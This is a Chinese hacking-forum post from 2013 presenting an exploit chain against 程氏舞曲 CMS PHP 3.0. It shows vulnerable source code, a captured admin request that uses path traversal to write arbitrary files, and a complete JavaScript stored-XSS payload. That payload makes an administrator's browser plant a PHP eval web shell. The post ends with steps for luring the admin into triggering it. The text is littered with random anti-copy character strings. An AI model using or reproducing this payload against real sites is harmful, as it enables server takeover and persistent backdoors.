找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2354|回复: 0
打印 上一主题 下一主题

程氏舞曲CMSPHP3.0 储存型xss getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-11-6 18:09:37 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题% J9 ^$ a& B6 g3 X; T! p8 X: q
官网已经修补了,所以重新下了源码' ?6 v2 Z  X- u/ i* \/ j: [. v
因为 后台登入 还需要认证码 所以 注入就没看了。
$ C& I5 |# ]6 {# M8 Z存在 xss* d3 G7 x, V5 V& E% c& w! p
漏洞文件 user/member/skin_edit.php, X+ ~: K" l* ?  Z; }2 G; n* D# q
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:5 a& y# \3 d4 M4 S1 P: E& t
  
9 o& F7 V3 `5 |; J# w3 i4 |4 m! P</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>5 a7 P& M/ S; i0 N8 S4 X- e
  4 |4 z7 Y) d5 `
</textarea></td></tr>
" m( W" y+ G5 \4 t  
( q; M, v5 s$ E" o  J3 _6 d# a4 w             user/do.php
* R# V/ B9 \: |( b0 O+ Y" Z  J& ]/ f! M: |5 r$ {* E+ Q5 q

. t3 C! W- z; Cif($op=='zl'){ //资料
8 g6 W8 i4 j0 P; w  & b3 {6 {' s; Z& H/ u3 ?5 t
             if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
6 B( a; Q6 @: o             exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
3 W% M/ x& H6 S0 ^4 B3 T. m  
, ?# w$ M6 _/ i, o& v             $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',& D( {+ R* _# r" @1 w9 O: l3 r
  4 C! ]' u! u5 C7 r: K# h' y0 L
             CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'( G# Q7 M; }7 t
             where CS_Name='".$cscms_name."'";! u' \$ K/ Y7 y
  
/ H1 p7 A2 @$ S" c             if($db->query($sql)){) t) r. O0 P) E: i& u) X
  + D: {7 `$ G; Z, P: v2 O- @2 S
              exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));, k+ h, E' U0 [! ~9 J
  5 |) F6 F5 U- S' Y; M1 S2 D
             }else{
! u- s' W6 d# `3 u" S) {4 H  
! q% a4 w9 H$ T+ W  g" B              exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));8 n& F% Z8 B& V( B( {# k  h
  
% J# ^. B; w* x  |+ W, }0 l             }
! X  P4 k  ?. W" w+ h. t  H1 W, f% d) h5 n5 P
4 T3 E6 ^9 M5 {$ d
没有 过滤导致xss产生。2 d6 a0 B- M  K5 H
后台 看了下 很奇葩的是可以写任意格式文件。。0 }6 K; I: r- t$ F9 m4 q  q
抓包。。" Q; F2 S' t7 E8 {0 V% N3 N- d& d1 k
. N) M! z4 S- m5 O6 @
6 Q% e; m9 b/ g: Z0 M, |7 ^
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
! i! z. I6 Q; m9 y7 m- ~  * ~3 C. H6 i9 D' i& Q
Accept: text/html, application/xhtml+xml, */*+ w) \6 o/ U4 k+ m' M5 E" q
  
8 c( B2 t! {9 K- H* c% h3 ]Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php* Z/ Y' i: X: ^1 k
  
+ _1 b/ w5 x7 eAccept-Language: zh-CN% ]6 n7 h7 d. y& P5 H9 g
  
9 m( ^8 P  v  c2 [2 _User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
/ S# `; Z) L  I3 X; F$ j1 a  
8 n. z( O+ k" F# ~$ ^Content-Type: application/x-www-form-urlencoded5 p# f! I9 B: @$ f) `
  - @4 V$ \6 L* C5 @( R% m
Accept-Encoding: gzip, deflate( P& M, G2 _& I* T
  $ C* O, n" B% V
Host: 127.0.0.1& ]8 F( a$ u" t$ F: l
  7 e) O' F7 |  \& f5 u$ u; L/ ?
Content-Length: 38
' B  ^; X% R8 v" }) X9 R  
4 e) s; H6 O  Q, _DNT: 1  F4 C. S- s4 V, U
  0 y# H. i% Y4 [# d
Connection: Keep-Alive% x+ s0 r" n/ |+ @: `  B
  
9 C( t7 x- K' G8 iCache-Control: no-cache2 c  x) o! N+ b3 ^3 Y5 ~
  . }, k# l/ B) ~7 M/ Z
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
( |5 [  e! _* n% I  1 \3 E2 d# g) t) Q- o

% K. Q( ]0 [( T6 t8 Dname=aaa.php&content=%3Cs%3E%3Ca%25%3E" i+ C' S+ l# s9 }2 l

; D& [+ |7 A( C$ M  H8 ]- D
8 A8 O3 z5 f' U
1 f: q% i# L) |4 _+ J8 S于是 构造js如下。
9 {- C9 ?; u' L2 f: t5 l/ i6 t+ j; m% O' W# B
本帖隐藏的内容<script>
& @3 [: t* p8 B, ]6 n1 L# l8 mthisTHost = top.location.hostname;- b1 m/ X) g, s, T
  
; g1 x, K3 B( D: W& uthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";6 f. g# A; l' D  _: ?# g! c
  
5 X. V  }" C0 f. Ffunction PostSubmit(url, data, msg) {
0 `& Y( P$ a" k% p5 C  x* r, S6 w4 F    var postUrl = url;
" Y- h2 Q' F; V  
3 R' q2 a# O& K8 w5 ^' e/ O    var postData = data; 6 u% h3 ]* }5 X/ c
    var msgData = msg;
. g+ y& ~8 t! |: [( M5 c; F    var ExportForm = document.createElement("FORM"); / @6 P+ z' N/ a3 `# J
    document.body.appendChild(ExportForm); % |& B6 y; b; M( s. D1 k
    ExportForm.method = "POST"; + {: V7 c) W1 g& V5 t2 N, D8 g
    var newElement = document.createElement("input");
5 w# A6 ^  S( _& e    newElement.setAttribute("name", "name"); 8 q* `" C2 R8 D# l  E# U
    newElement.setAttribute("type", "hidden"); ! E( m& \4 y( }# p5 Z
    var newElement2 = document.createElement("input"); ! O8 y8 j/ g# R" R% M7 G- a
    newElement2.setAttribute("name", "content"); , v+ f. Y% R7 D
    newElement2.setAttribute("type", "hidden");
" n$ w4 U& h# t5 N    ExportForm.appendChild(newElement); 5 E0 P1 ^6 H+ W* }, q/ c) r
    ExportForm.appendChild(newElement2);
* {! P3 }: q4 r% [    newElement.value = postData;
- H% p1 V. R5 R) W; x$ v1 f3 h2 ^    newElement2.value = msgData; ! s, ]7 Y$ `5 b3 c' M! x
    ExportForm.action = postUrl;
$ v5 m  m/ q' d( [8 M! O    ExportForm.submit(); ) M  D& i% U! s6 ^
};
% H2 K# t: U  X  " x# P3 l; a8 V& W
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");' e0 J: m. L' e4 k% c
  
- I/ e; P0 \% s9 _& y3 ^4 l</script>9 i! r+ a1 E& n

/ _8 S4 P& [* y  T+ I
2 ?  v* w* p, L( T, h) J
3 I! C2 W# y) |! ahttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入1 j/ c/ |3 E. I1 f
用你的账号给管理写个 私信 或者让他访问  你的主页http://127.0.0.1/home/?uid=2(uid自己改)
/ \2 ]! b3 M7 X' J7 {就会 在 skins\index\html\目录下生成 roker.php 一句话。

+ v  f( T# E" a9 \" ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表